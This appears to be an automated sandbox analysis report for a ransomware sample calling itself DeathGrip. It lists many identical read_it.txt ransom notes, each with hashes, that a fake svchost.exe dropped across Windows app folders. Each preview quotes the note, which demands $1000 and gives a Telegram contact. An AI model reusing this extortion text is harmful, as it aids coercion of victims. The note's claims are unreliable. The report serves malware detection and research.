                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280811\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280815\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310091\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310093\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\314559\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338389\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\353694\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\353698\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\88000045\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\88000161\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\88000163\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\88000165\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\onesettings_waas_featuremanagement\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
